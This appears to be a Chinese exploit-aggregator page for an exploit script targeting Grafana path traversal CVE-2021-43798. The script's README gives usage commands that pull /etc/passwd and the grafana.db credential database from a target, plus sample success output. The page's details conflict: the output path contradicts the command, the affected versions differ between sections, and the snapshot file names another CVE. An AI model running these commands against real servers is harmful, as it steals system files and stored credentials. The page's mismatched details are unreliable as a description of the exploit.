POC详情: ff96a4887b0542d255d1c55a40716de842a83642

来源
关联漏洞
标题: Grafana 路径遍历漏洞 (CVE-2021-43798)
描述:Grafana是Grafana实验室的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。 Grafana 8.0.0-beta1至8.3.0存在路径遍历漏洞,攻击者可利用该漏洞执行目录遍历攻击,访问本地文件。
描述
Exploit for CVE-2021-43798
介绍
# CVE-2021-43798

This is a script to exploit CVE-2021-43798 a directory traversal vulnerability in Grafana versions from 8.0.1-beta1 through 8.3.0.

## Usage

To use this script simply supply the base URL of the target Grafana instance that you would like to exploit.

```bash
python3 exploit.py --url http://localhost:3000 --file  /etc/passwd
```

This will write the output to stdout but if you'd like to write the output directly to disk instead you can do so with the `--output` flag

## Example

```bash
$ python3 exploit.py --url http://localhost:3000 --file /var/lib/grafana/grafana.db --output ./grafana.db
[+] Target is vulnerable!
[+] Successfully wrote file to /etc/passwd
```

## Disclaimer

This script is for educational and security assessment purposes only and should not be used in any malicious way. The author of this script is not responsible for any misuse of this tool.

## References

- https://nvd.nist.gov/vuln/detail/CVE-2021-43798
-
文件快照

[4.0K] /data/pocs/ff96a4887b0542d255d1c55a40716de842a83642 ├── [1.9K] cve_2023_43789.py └── [ 961] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。